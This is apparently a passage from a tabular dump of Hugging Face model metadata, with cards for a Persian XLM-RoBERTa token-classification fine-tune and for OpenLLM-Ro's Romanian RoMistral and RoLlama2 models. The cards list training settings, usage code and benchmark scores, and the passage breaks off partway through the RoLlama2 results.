modelId (string, 5-139 chars) | author (string, 2-42 chars) | last_modified (timestamp[us, tz=UTC], 2020-02-15 11:33:14 to 2025-06-27 12:29:05) | downloads (int64, 0 to 223M) | likes (int64, 0 to 11.7k) | library_name (string, 500 classes) | tags (sequence, 1 to 4.05k items) | pipeline_tag (string, 54 classes) | createdAt (timestamp[us, tz=UTC], 2022-03-02 23:29:04 to 2025-06-27 12:27:55) | card (string, 11 chars to 1.01M chars) |
---|---|---|---|---|---|---|---|---|---|
rezzzzzaaaaaa/xlm-roberta-base-finetuned-arman-fa | rezzzzzaaaaaa | 2024-10-10T13:44:08Z | 134 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"xlm-roberta",
"token-classification",
"generated_from_trainer",
"base_model:FacebookAI/xlm-roberta-base",
"base_model:finetune:FacebookAI/xlm-roberta-base",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | token-classification | 2024-10-10T13:16:51Z | ---
library_name: transformers
license: mit
base_model: xlm-roberta-base
tags:
- generated_from_trainer
metrics:
- f1
model-index:
- name: xlm-roberta-base-finetuned-arman-fa
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# xlm-roberta-base-finetuned-arman-fa
This model is a fine-tuned version of [xlm-roberta-base](https://huggingface.co/xlm-roberta-base) on an unspecified dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0092
- F1: 0.9849
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 5
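For reference, these settings map onto 🤗 `TrainingArguments` roughly as in the sketch below (the `output_dir` is an assumption, and the Adam betas/epsilon are the library defaults; dataset loading and the `Trainer` call are omitted because the training data is not documented in this card):
```python
from transformers import TrainingArguments

# Sketch only: mirrors the hyperparameters listed above.
training_args = TrainingArguments(
    output_dir="xlm-roberta-base-finetuned-arman-fa",  # assumption
    learning_rate=5e-5,
    per_device_train_batch_size=8,
    per_device_eval_batch_size=8,
    seed=42,
    adam_beta1=0.9,      # library default
    adam_beta2=0.999,    # library default
    adam_epsilon=1e-8,   # library default
    lr_scheduler_type="linear",
    num_train_epochs=5,
)
```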
### Training results
| Training Loss | Epoch | Step | Validation Loss | F1 |
|:-------------:|:-----:|:-----:|:---------------:|:------:|
| 0.1055 | 1.0 | 2305 | 0.0489 | 0.8743 |
| 0.0377 | 2.0 | 4610 | 0.0297 | 0.9117 |
| 0.0159 | 3.0 | 6915 | 0.0190 | 0.9541 |
| 0.0066 | 4.0 | 9220 | 0.0109 | 0.9781 |
| 0.0025 | 5.0 | 11525 | 0.0092 | 0.9849 |
### Framework versions
- Transformers 4.45.1
- Pytorch 2.4.0
- Datasets 3.0.1
- Tokenizers 0.20.0
|
OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17 | OpenLLM-Ro | 2024-10-10T13:39:53Z | 58 | 4 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"conversational",
"ro",
"dataset:OpenLLM-Ro/ro_sft_alpaca",
"dataset:OpenLLM-Ro/ro_sft_alpaca_gpt4",
"dataset:OpenLLM-Ro/ro_sft_dolly",
"dataset:OpenLLM-Ro/ro_sft_selfinstruct_gpt4",
"dataset:OpenLLM-Ro/ro_sft_norobots",
"dataset:OpenLLM-Ro/ro_sft_orca",
"dataset:OpenLLM-Ro/ro_sft_camel",
"arxiv:2406.18266",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:finetune:mistralai/Mistral-7B-v0.1",
"license:cc-by-nc-4.0",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-05-14T16:55:16Z | ---
license: cc-by-nc-4.0
language:
- ro
base_model:
- mistralai/Mistral-7B-v0.1
datasets:
- OpenLLM-Ro/ro_sft_alpaca
- OpenLLM-Ro/ro_sft_alpaca_gpt4
- OpenLLM-Ro/ro_sft_dolly
- OpenLLM-Ro/ro_sft_selfinstruct_gpt4
- OpenLLM-Ro/ro_sft_norobots
- OpenLLM-Ro/ro_sft_orca
- OpenLLM-Ro/ro_sft_camel
model-index:
- name: OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17
results:
- task:
type: text-generation
dataset:
name: RoMT-Bench
type: RoMT-Bench
metrics:
- name: Score
type: Score
value: 4.99
- task:
type: text-generation
dataset:
name: RoCulturaBench
type: RoCulturaBench
metrics:
- name: Score
type: Score
value: 3.38
- task:
type: text-generation
dataset:
name: Romanian_Academic_Benchmarks
type: Romanian_Academic_Benchmarks
metrics:
- name: Average accuracy
type: accuracy
value: 52.54
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: Average accuracy
type: accuracy
value: 50.41
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: Average accuracy
type: accuracy
value: 51.61
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: Average accuracy
type: accuracy
value: 66.48
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: Average accuracy
type: accuracy
value: 60.27
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: Average accuracy
type: accuracy
value: 34.19
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_truthfulqa
type: OpenLLM-Ro/ro_truthfulqa
metrics:
- name: Average accuracy
type: accuracy
value: 52.30
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: Average macro-f1
type: macro-f1
value: 97.36
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: Average macro-f1
type: macro-f1
value: 67.55
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary_finetuned
type: LaRoSeDa_binary_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 98.80
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass_finetuned
type: LaRoSeDa_multiclass_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 88.28
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: Average bleu
type: bleu
value: 27.93
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: Average bleu
type: bleu
value: 13.21
- task:
type: text-generation
dataset:
name: WMT_EN-RO_finetuned
type: WMT_EN-RO_finetuned
metrics:
- name: Average bleu
type: bleu
value: 28.72
- task:
type: text-generation
dataset:
name: WMT_RO-EN_finetuned
type: WMT_RO-EN_finetuned
metrics:
- name: Average bleu
type: bleu
value: 40.86
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average exact_match
type: exact_match
value: 43.66
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average f1
type: f1
value: 63.70
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average exact_match
type: exact_match
value: 55.04
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average f1
type: f1
value: 72.31
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average spearman
type: spearman
value: 77.43
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average pearson
type: pearson
value: 78.43
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average spearman
type: spearman
value: 87.25
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average pearson
type: pearson
value: 87.79
- task:
type: text-generation
dataset:
name: RoMT-Bench
type: RoMT-Bench
metrics:
- name: First turn
type: Score
value: 5.46
- name: Second turn
type: Score
value: 4.53
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: 0-shot
type: accuracy
value: 47.47
- name: 1-shot
type: accuracy
value: 48.59
- name: 3-shot
type: accuracy
value: 50.30
- name: 5-shot
type: accuracy
value: 51.33
- name: 10-shot
type: accuracy
value: 52.36
- name: 25-shot
type: accuracy
value: 52.44
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: 0-shot
type: accuracy
value: 50.01
- name: 1-shot
type: accuracy
value: 50.18
- name: 3-shot
type: accuracy
value: 53.13
- name: 5-shot
type: accuracy
value: 53.12
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: 0-shot
type: accuracy
value: 64.96
- name: 1-shot
type: accuracy
value: 67.09
- name: 3-shot
type: accuracy
value: 67.01
- name: 5-shot
type: accuracy
value: 66.85
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: 0-shot
type: accuracy
value: 59.99
- name: 1-shot
type: accuracy
value: 59.48
- name: 3-shot
type: accuracy
value: 60.14
- name: 5-shot
type: accuracy
value: 60.61
- name: 10-shot
type: accuracy
value: 61.12
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: 1-shot
type: accuracy
value: 21.68
- name: 3-shot
type: accuracy
value: 38.21
- name: 5-shot
type: accuracy
value: 42.68
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: 0-shot
type: macro-f1
value: 97.27
- name: 1-shot
type: macro-f1
value: 96.37
- name: 3-shot
type: macro-f1
value: 97.97
- name: 5-shot
type: macro-f1
value: 97.83
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: 0-shot
type: macro-f1
value: 63.95
- name: 1-shot
type: macro-f1
value: 66.89
- name: 3-shot
type: macro-f1
value: 68.16
- name: 5-shot
type: macro-f1
value: 71.19
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: 0-shot
type: bleu
value: 24.87
- name: 1-shot
type: bleu
value: 28.30
- name: 3-shot
type: bleu
value: 29.26
- name: 5-shot
type: bleu
value: 29.27
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: 0-shot
type: bleu
value: 3.69
- name: 1-shot
type: bleu
value: 5.45
- name: 3-shot
type: bleu
value: 19.92
- name: 5-shot
type: bleu
value: 23.80
- task:
type: text-generation
dataset:
name: XQuAD_EM
type: XQuAD_EM
metrics:
- name: 0-shot
type: exact_match
value: 23.36
- name: 1-shot
type: exact_match
value: 47.98
- name: 3-shot
type: exact_match
value: 51.85
- name: 5-shot
type: exact_match
value: 51.43
- task:
type: text-generation
dataset:
name: XQuAD_F1
type: XQuAD_F1
metrics:
- name: 0-shot
type: f1
value: 46.29
- name: 1-shot
type: f1
value: 67.40
- name: 3-shot
type: f1
value: 70.58
- name: 5-shot
type: f1
value: 70.53
- task:
type: text-generation
dataset:
name: STS_Spearman
type: STS_Spearman
metrics:
- name: 1-shot
type: spearman
value: 77.91
- name: 3-shot
type: spearman
value: 77.73
- name: 5-shot
type: spearman
value: 76.65
- task:
type: text-generation
dataset:
name: STS_Pearson
type: STS_Pearson
metrics:
- name: 1-shot
type: pearson
value: 78.03
- name: 3-shot
type: pearson
value: 78.74
- name: 5-shot
type: pearson
value: 78.53
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
RoMistral is a family of pretrained and fine-tuned generative text models for Romanian. This is the repository for the **instruct 7B model**. Links to other models can be found at the bottom of this page.
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
OpenLLM-Ro represents the first open-source effort to build an LLM specialized for Romanian. OpenLLM-Ro has developed and publicly released a collection of Romanian LLMs, both as foundational models and as instruct and chat variants.
- **Developed by:** OpenLLM-Ro
<!-- - **Funded by [optional]:** [More Information Needed] -->
<!-- - **Shared by [optional]:** [More Information Needed] -->
<!-- - **Model type:** [More Information Needed] -->
- **Language(s):** Romanian
- **License:** cc-by-nc-4.0
- **Finetuned from model:** [Mistral-7B-v0.1](https://huggingface.co/mistralai/Mistral-7B-v0.1)
- **Trained using:** [RoAlpaca](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_alpaca), [RoAlpacaGPT4](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_alpaca_gpt4), [RoDolly](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_dolly), [RoSelfInstruct](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_selfinstruct_gpt4), [RoNoRobots](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_norobots), [RoOrca](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_orca), [RoCamel](https://huggingface.co/datasets/OpenLLM-Ro/ro_sft_camel)
<!-- - **Finetuned from model [optional]:** [More Information Needed] -->
### Model Sources
<!-- Provide the basic links for the model. -->
- **Repository:** https://github.com/OpenLLM-Ro/LLaMA-Factory
- **Paper:** https://arxiv.org/abs/2406.18266
## Intended Use
### Intended Use Cases
RoMistral is intended for research use in Romanian. Base models can be adapted for a variety of natural language tasks, while instruction- and chat-tuned models are intended for assistant-like chat.
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
Use in any manner that violates the license or any applicable laws or regulations, and use in languages other than Romanian.
## How to Get Started with the Model
Use the code below to get started with the model.
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
tokenizer = AutoTokenizer.from_pretrained("OpenLLM-Ro/RoMistral-7b-Instruct-05-17")
model = AutoModelForCausalLM.from_pretrained("OpenLLM-Ro/RoMistral-7b-Instruct-05-17")
instruction = "Ce jocuri de societate pot juca cu prietenii mei?"
chat = [
{"role": "user", "content": instruction},
]
prompt = tokenizer.apply_chat_template(chat, tokenize=False, system_message="")
inputs = tokenizer.encode(prompt, add_special_tokens=False, return_tensors="pt")
outputs = model.generate(input_ids=inputs, max_new_tokens=128)
print(tokenizer.decode(outputs[0]))
```
## Academic Benchmarks
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>ARC</center></strong></td>
<td><strong><center>MMLU</center></strong></td>
<td><strong><center>Winogrande</center></strong></td>
<td><strong><center>Hellaswag</center></strong></td>
<td><strong><center>GSM8k</center></strong></td>
<td><strong><center>TruthfulQA</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>47.40</center></td><td><center>46.29</center></td><td><center>47.00</center></td><td><center>58.78</center></td><td><center>54.27</center></td><td><center>13.47</center></td><td><center><strong>64.59</strong></center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>52.54</em></center></td><td><center><em>50.41</em></center></td><td><center><em><strong>51.61</strong></em></center></td><td><center><em>66.48</em></center></td><td><center><em>60.27</em></center></td><td><center><em><strong>34.19</strong></em></center></td><td><center><em>52.30</em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center><strong>52.91</strong></center></td><td><center><strong>52.27</strong></center></td><td><center>49.33</center></td><td><center><strong>70.03</strong></center></td><td><center><strong>62.88</strong></center></td><td><center>32.42</center></td><td><center>50.51</center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>51.95</center></td><td><center>50.73</center></td><td><center>47.88</center></td><td><center>68.41</center></td><td><center>62.27</center></td><td><center>32.27</center></td><td><center>50.12</center></td>
</tr>
</tbody>
</table>
## Downstream tasks
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>LaRoSeDa</strong></center></td>
<td colspan="4"><center><strong>WMT</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>Binary<br>(Macro F1)</strong></center></td>
<td><center><strong>Multiclass<br>(Macro F1)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
<td><center><strong>EN-RO<br>(Bleu)</strong></center></td>
<td><center><strong>RO-EN<br>(Bleu)</strong></center></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>96.97</center></td><td><center>56.66</center></td><td><center>98.83</center></td><td><center>87.32</center></td><td><center>18.60</center></td><td><center><strong>33.99</strong></center></td><td><center>26.19</center></td><td><center>39.88</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em><strong>97.36</strong></em></center></td><td><center><em>67.55</em></center></td><td><center><em>98.80</em></center></td><td><center><em><strong>88.28</strong></em></center></td><td><center><em>27.93</em></center></td><td><center><em>13.21</em></center></td><td><center><em><strong>28.72</strong></em></center></td><td><center><em><strong>40.86</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>95.56</center></td><td><center><strong>67.83</strong></center></td><td><center><strong>99.00</strong></center></td><td><center>87.57</center></td><td><center><strong>28.28</strong></center></td><td><center>6.10</center></td><td><center>27.70</center></td><td><center>40.36</center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>82.13</center></td><td><center>65.24</center></td><td><center>-</center></td><td><center>-</center></td><td><center>26.25</center></td><td><center>6.09</center></td><td><center>-</center></td><td><center>-</center></td>
</tr>
</tbody>
</table>
<table>
<tbody>
<tr>
<td></td>
<td colspan="4"><center><strong>XQuAD</strong></center></td>
<td colspan="4"><center><strong>STS</strong></center></td>
</tr>
<tr>
<td></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
<td colspan="2"><center><strong>Few-shot</strong></center></td>
<td colspan="2"><center><strong>Finetuned</strong></center></td>
</tr>
<tr>
<td><strong>Model</strong></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(EM)</strong></center></td>
<td><center><strong>(F1)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
<td><center><strong>(Spearman)</strong></center></td>
<td><center><strong>(Pearson)</strong></center></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>27.92</center></td><td><center>50.71</center></td><td><center><strong>65.46</strong></center></td><td><center><strong>79.73</strong></center></td><td><center>62.62</center></td><td><center>60.86</center></td><td><center>84.92</center></td><td><center>85.44</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em><strong>43.66</strong></em></center></td><td><center><em><strong>63.70</strong></em></center></td><td><center><em>55.04</em></center></td><td><center><em>72.31</em></center></td><td><center><em>77.43</em></center></td><td><center><em><strong>78.43</strong></em></center></td><td><center><em>87.25</em></center></td><td><center><em>87.79</em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>41.09</center></td><td><center>63.21</center></td><td><center>47.56</center></td><td><center>62.69</center></td><td><center><strong>78.47</strong></center></td><td><center>77.24</center></td><td><center><strong>87.28</strong></center></td><td><center><strong>87.88</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center>23.40</center></td><td><center>45.80</center></td><td><center>-</center></td><td><center>-</center></td><td><center>77.33</center></td><td><center>76.60</center></td><td><center>-</center></td><td><center>-</center></td>
</tr>
</tbody>
</table>
## MT-Bench
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>1st turn</center></strong></td>
<td><strong><center>2nd turn</center></strong></td>
<td><strong><center>Answers in Ro</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>5.03</center></td><td><center>5.05</center></td><td><center>5.00</center></td><td><center>154/160</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>4.99</em></center></td><td><center><em>5.46</em></center></td><td><center><em>4.53</em></center></td><td><center><em><strong>160/160</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>5.29</center></td><td><center>5.86</center></td><td><center>4.72</center></td><td><center><strong>160/160</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center><strong>5.88</strong></center></td><td><center><strong>6.44</strong></center></td><td><center><strong>5.33</strong></center></td><td><center><strong>160/160</strong></center></td>
</tr>
</tbody>
</table>
## RoCulturaBench
<table>
<tbody>
<tr>
<td><strong>Model</strong></td>
<td><strong><center>Average</center></strong></td>
<td><strong><center>Answers in Ro</center></strong></td>
</tr>
<tr>
<td>Mistral-7B-Instruct-v0.2</td><td><center>3.68</center></td><td><center>97/100</center></td>
</tr>
<tr>
<td><em>RoMistral-7b-Instruct-2024-05-17</em></td><td><center><em>3.38</em></center></td><td><center><em><strong>100/100</strong></em></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-2024-10-09</td><td><center>3.99</center></td><td><center><strong>100/100</strong></center></td>
</tr>
<tr>
<td>RoMistral-7b-Instruct-DPO-2024-10-09</td><td><center><strong>4.72</strong></center></td><td><center><strong>100/100</strong></center></td>
</tr>
</tbody>
</table>
## RoMistral Model Family
| Model | Link |
|--------------------|:--------:|
|*RoMistral-7b-Instruct-2024-05-17*| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-2024-05-17) |
|RoMistral-7b-Instruct-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-2024-10-09) |
|RoMistral-7b-Instruct-DPO-2024-10-09| [link](https://huggingface.co/OpenLLM-Ro/RoMistral-7b-Instruct-DPO-2024-10-09) |
## Citation
```
@misc{masala2024vorbecstiromanecsterecipetrain,
title={"Vorbe\c{s}ti Rom\^ane\c{s}te?" A Recipe to Train Powerful Romanian LLMs with English Instructions},
author={Mihai Masala and Denis C. Ilie-Ablachim and Alexandru Dima and Dragos Corlatescu and Miruna Zavelca and Ovio Olaru and Simina Terian-Dan and Andrei Terian-Dan and Marius Leordeanu and Horia Velicu and Marius Popescu and Mihai Dascalu and Traian Rebedea},
year={2024},
eprint={2406.18266},
archivePrefix={arXiv},
primaryClass={cs.CL},
url={https://arxiv.org/abs/2406.18266},
}
```
<!-- **APA:**
[More Information Needed] --> |
OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14 | OpenLLM-Ro | 2024-10-10T13:35:16Z | 142 | 4 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"ro",
"dataset:uonlp/CulturaX",
"arxiv:2406.18266",
"base_model:meta-llama/Llama-2-7b-hf",
"base_model:finetune:meta-llama/Llama-2-7b-hf",
"license:llama2",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-02-21T10:16:52Z | ---
license: llama2
language:
- ro
base_model: meta-llama/Llama-2-7b-hf
datasets:
- uonlp/CulturaX
model-index:
- name: OpenLLM-Ro/RoLlama2-7b-Base-2024-05-14
results:
- task:
type: text-generation
dataset:
name: Romanian_Academic_Benchmarks
type: Romanian_Academic_Benchmarks
metrics:
- name: Average accuracy
type: accuracy
value: 38.03
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: Average accuracy
type: accuracy
value: 37.95
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: Average accuracy
type: accuracy
value: 27.22
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: Average accuracy
type: accuracy
value: 59.29
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: Average accuracy
type: accuracy
value: 57.22
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: Average accuracy
type: accuracy
value: 2.53
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_truthfulqa
type: OpenLLM-Ro/ro_truthfulqa
metrics:
- name: Average accuracy
type: accuracy
value: 44.00
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: Average macro-f1
type: macro-f1
value: 83.25
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: Average macro-f1
type: macro-f1
value: 61.04
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary_finetuned
type: LaRoSeDa_binary_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 98.97
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass_finetuned
type: LaRoSeDa_multiclass_finetuned
metrics:
- name: Average macro-f1
type: macro-f1
value: 87.72
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: Average bleu
type: bleu
value: 10.01
- task:
type: text-generation
dataset:
name: WMT_RO-EN
type: WMT_RO-EN
metrics:
- name: Average bleu
type: bleu
value: 13.03
- task:
type: text-generation
dataset:
name: WMT_EN-RO_finetuned
type: WMT_EN-RO_finetuned
metrics:
- name: Average bleu
type: bleu
value: 27.85
- task:
type: text-generation
dataset:
name: WMT_RO-EN_finetuned
type: WMT_RO-EN_finetuned
metrics:
- name: Average bleu
type: bleu
value: 39.30
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average exact_match
type: exact_match
value: 30.15
- task:
type: text-generation
dataset:
name: XQuAD
type: XQuAD
metrics:
- name: Average f1
type: f1
value: 47.03
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average exact_match
type: exact_match
value: 67.06
- task:
type: text-generation
dataset:
name: XQuAD_finetuned
type: XQuAD_finetuned
metrics:
- name: Average f1
type: f1
value: 79.96
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average spearman
type: spearman
value: 7.89
- task:
type: text-generation
dataset:
name: STS
type: STS
metrics:
- name: Average pearson
type: pearson
value: 7.98
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average spearman
type: spearman
value: 71.75
- task:
type: text-generation
dataset:
name: STS_finetuned
type: STS_finetuned
metrics:
- name: Average pearson
type: pearson
value: 71.99
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_arc_challenge
type: OpenLLM-Ro/ro_arc_challenge
metrics:
- name: 0-shot
type: accuracy
value: 35.56
- name: 1-shot
type: accuracy
value: 36.42
- name: 3-shot
type: accuracy
value: 38.56
- name: 5-shot
type: accuracy
value: 38.39
- name: 10-shot
type: accuracy
value: 39.07
- name: 25-shot
type: accuracy
value: 39.67
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_mmlu
type: OpenLLM-Ro/ro_mmlu
metrics:
- name: 0-shot
type: accuracy
value: 25.82
- name: 1-shot
type: accuracy
value: 25.48
- name: 3-shot
type: accuracy
value: 27.61
- name: 5-shot
type: accuracy
value: 29.96
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_winogrande
type: OpenLLM-Ro/ro_winogrande
metrics:
- name: 0-shot
type: accuracy
value: 58.72
- name: 1-shot
type: accuracy
value: 58.88
- name: 3-shot
type: accuracy
value: 60.38
- name: 5-shot
type: accuracy
value: 59.19
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_hellaswag
type: OpenLLM-Ro/ro_hellaswag
metrics:
- name: 0-shot
type: accuracy
value: 55.85
- name: 1-shot
type: accuracy
value: 57.06
- name: 3-shot
type: accuracy
value: 57.52
- name: 5-shot
type: accuracy
value: 57.89
- name: 10-shot
type: accuracy
value: 57.79
- task:
type: text-generation
dataset:
name: OpenLLM-Ro/ro_gsm8k
type: OpenLLM-Ro/ro_gsm8k
metrics:
- name: 1-shot
type: accuracy
value: 0.00
- name: 3-shot
type: accuracy
value: 2.96
- name: 5-shot
type: accuracy
value: 4.62
- task:
type: text-generation
dataset:
name: LaRoSeDa_binary
type: LaRoSeDa_binary
metrics:
- name: 0-shot
type: macro-f1
value: 42.78
- name: 1-shot
type: macro-f1
value: 98.00
- name: 3-shot
type: macro-f1
value: 95.13
- name: 5-shot
type: macro-f1
value: 97.07
- task:
type: text-generation
dataset:
name: LaRoSeDa_multiclass
type: LaRoSeDa_multiclass
metrics:
- name: 0-shot
type: macro-f1
value: 46.41
- name: 1-shot
type: macro-f1
value: 67.36
- name: 3-shot
type: macro-f1
value: 65.16
- name: 5-shot
type: macro-f1
value: 65.23
- task:
type: text-generation
dataset:
name: WMT_EN-RO
type: WMT_EN-RO
metrics:
- name: 0-shot
type: bleu
value: 4.45
